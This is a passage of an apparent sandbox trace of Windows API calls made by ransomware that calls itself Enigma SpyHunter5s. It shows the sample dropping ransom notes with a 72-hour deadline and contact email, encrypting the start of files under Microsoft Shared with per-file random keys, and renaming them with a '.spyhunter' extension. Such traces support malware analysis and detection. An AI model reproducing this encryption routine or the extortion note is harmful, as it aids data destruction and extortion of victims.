lpMem=0x37e050 | out: hHeap=0x2c0000) returned 1 [0090.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.951] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.951] WriteFile (in: hFile=0xcc, lpBuffer=0x270fc5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd88, lpOverlapped=0x0 | out: lpBuffer=0x270fc5f*, lpNumberOfBytesWritten=0x270fd88*=0x127, lpOverlapped=0x0) returned 1 [0090.952] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.952] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd88*=0x2ac, lpOverlapped=0x0) returned 1 [0090.952] CloseHandle (hObject=0xcc) returned 1 [0090.953] GetProcessHeap () returned 0x2c0000 [0090.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3412d0 | out: hHeap=0x2c0000) returned 1 [0090.953] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd28 | out: pbBuffer=0x270fd28) returned 1 [0090.953] GetProcessHeap () returned 0x2c0000 [0090.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.953] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd20*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd20*=0x30) returned 1 [0090.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0090.954] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.954] GetProcessHeap () returned 0x2c0000 [0090.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0090.954] ReadFile (in: hFile=0xcc, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fce4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fce4*=0x2800, lpOverlapped=0x0) returned 1 [0091.076] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.076] WriteFile (in: hFile=0xcc, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fce4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fce4*=0x2800, lpOverlapped=0x0) returned 1 [0091.076] GetProcessHeap () returned 0x2c0000 [0091.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.077] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.077] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fce4, lpOverlapped=0x0 | out: lpBuffer=0x270fd24*, lpNumberOfBytesWritten=0x270fce4*=0x4, lpOverlapped=0x0) returned 1 [0091.111] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fce4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fce4*=0x30, lpOverlapped=0x0) returned 1 [0091.111] CloseHandle (hObject=0xcc) returned 1 [0091.112] GetProcessHeap () returned 0x2c0000 [0091.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.113] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.spyhunter") returned 89 [0091.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.spyhunter")) returned 1 [0091.113] GetProcessHeap () returned 0x2c0000 [0091.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.113] GetProcessHeap () returned 0x2c0000 [0091.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.114] GetProcessHeap () returned 0x2c0000 [0091.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377428 | out: hHeap=0x2c0000) returned 1 [0091.114] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd20 | out: pbBuffer=0x270fd20) returned 1 [0091.114] GetProcessHeap () returned 0x2c0000 [0091.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd18*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd18*=0x30) returned 1 [0091.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0091.115] StrStrW (lpFirst="WTSP61MS.DLL", lpSrch=".txt") returned 0x0 [0091.115] GetProcessHeap () returned 0x2c0000 [0091.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.115] ReadFile (in: hFile=0xcc, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fcdc*=0x2800, lpOverlapped=0x0) returned 1 [0091.130] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.130] WriteFile (in: hFile=0xcc, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fcdc*=0x2800, lpOverlapped=0x0) returned 1 [0091.131] GetProcessHeap () returned 0x2c0000 [0091.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.132] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x270fd1c*, lpNumberOfBytesWritten=0x270fcdc*=0x4, lpOverlapped=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcdc*=0x30, lpOverlapped=0x0) returned 1 [0091.132] CloseHandle (hObject=0xcc) returned 1 [0091.142] GetProcessHeap () returned 0x2c0000 [0091.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.142] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.spyhunter") returned 82 [0091.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll.spyhunter")) returned 1 [0091.153] GetProcessHeap () returned 0x2c0000 [0091.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.153] GetProcessHeap () returned 0x2c0000 [0091.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.153] GetProcessHeap () returned 0x2c0000 [0091.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3468e8 | out: hHeap=0x2c0000) returned 1 [0091.153] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd20 | out: pbBuffer=0x270fd20) returned 1 [0091.153] GetProcessHeap () returned 0x2c0000 [0091.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd18*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd18*=0x30) returned 1 [0091.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0091.224] StrStrW (lpFirst="MSB1CORE.DLL", lpSrch=".txt") returned 0x0 [0091.224] GetProcessHeap () returned 0x2c0000 [0091.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0091.224] ReadFile (in: hFile=0xcc, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x270fcdc*=0x2800, lpOverlapped=0x0) returned 1 [0091.237] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.237] WriteFile (in: hFile=0xcc, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x270fcdc*=0x2800, lpOverlapped=0x0) returned 1 [0091.237] GetProcessHeap () returned 0x2c0000 [0091.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.237] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.237] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x270fd1c*, lpNumberOfBytesWritten=0x270fcdc*=0x4, lpOverlapped=0x0) returned 1 [0091.284] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcdc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcdc*=0x30, lpOverlapped=0x0) returned 1 [0091.285] CloseHandle (hObject=0xcc) returned 1 [0091.323] GetProcessHeap () returned 0x2c0000 [0091.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.324] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.spyhunter") returned 82 [0091.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll.spyhunter")) returned 1 [0091.325] GetProcessHeap () returned 0x2c0000 [0091.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.325] GetProcessHeap () returned 0x2c0000 [0091.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.325] GetProcessHeap () returned 0x2c0000 [0091.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0091.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.330] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.330] WriteFile (in: hFile=0xcc, lpBuffer=0x270fc4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd78, lpOverlapped=0x0 | out: lpBuffer=0x270fc4f*, lpNumberOfBytesWritten=0x270fd78*=0x127, lpOverlapped=0x0) returned 1 [0091.331] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.331] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd78*=0x2ac, lpOverlapped=0x0) returned 1 [0091.332] CloseHandle (hObject=0xcc) returned 1 [0091.332] GetProcessHeap () returned 0x2c0000 [0091.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e2d8 | out: hHeap=0x2c0000) returned 1 [0091.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd18 | out: pbBuffer=0x270fd18) returned 1 [0091.332] GetProcessHeap () returned 0x2c0000 [0091.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd10*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd10*=0x30) returned 1 [0091.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.368] GetProcessHeap () returned 0x2c0000 [0091.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.369] GetProcessHeap () returned 0x2c0000 [0091.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d4f0 | out: hHeap=0x2c0000) returned 1 [0091.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd10 | out: pbBuffer=0x270fd10) returned 1 [0091.369] GetProcessHeap () returned 0x2c0000 [0091.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd08*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd08*=0x30) returned 1 [0091.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0091.371] StrStrW (lpFirst="msdia100.dll", lpSrch=".txt") returned 0x0 [0091.371] GetProcessHeap () returned 0x2c0000 [0091.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20090 [0091.371] ReadFile (in: hFile=0xcc, lpBuffer=0x2c20090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x2c20090*, lpNumberOfBytesRead=0x270fccc*=0x2800, lpOverlapped=0x0) returned 1 [0091.392] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.393] WriteFile (in: hFile=0xcc, lpBuffer=0x2c20090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x2c20090*, lpNumberOfBytesWritten=0x270fccc*=0x2800, lpOverlapped=0x0) returned 1 [0091.393] GetProcessHeap () returned 0x2c0000 [0091.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.393] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.393] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x270fd0c*, lpNumberOfBytesWritten=0x270fccc*=0x4, lpOverlapped=0x0) returned 1 [0091.408] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fccc*=0x30, lpOverlapped=0x0) returned 1 [0091.408] CloseHandle (hObject=0xcc) returned 1 [0091.421] GetProcessHeap () returned 0x2c0000 [0091.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.421] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.spyhunter") returned 76 [0091.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.spyhunter")) returned 1 [0091.422] GetProcessHeap () returned 0x2c0000 [0091.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.422] GetProcessHeap () returned 0x2c0000 [0091.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.422] GetProcessHeap () returned 0x2c0000 [0091.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0091.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd10 | out: pbBuffer=0x270fd10) returned 1 [0091.422] GetProcessHeap () returned 0x2c0000 [0091.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd08*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd08*=0x30) returned 1 [0091.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.423] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0091.423] StrStrW (lpFirst="VBOB6.CHM", lpSrch=".txt") returned 0x0 [0091.423] GetProcessHeap () returned 0x2c0000 [0091.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.423] ReadFile (in: hFile=0xcc, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x270fccc*=0x2800, lpOverlapped=0x0) returned 1 [0091.464] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.464] WriteFile (in: hFile=0xcc, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x270fccc*=0x2800, lpOverlapped=0x0) returned 1 [0091.464] GetProcessHeap () returned 0x2c0000 [0091.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.464] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.464] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x270fd0c*, lpNumberOfBytesWritten=0x270fccc*=0x4, lpOverlapped=0x0) returned 1 [0091.481] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fccc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fccc*=0x30, lpOverlapped=0x0) returned 1 [0091.481] CloseHandle (hObject=0xcc) returned 1 [0091.483] GetProcessHeap () returned 0x2c0000 [0091.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.483] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.spyhunter") returned 84 [0091.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft 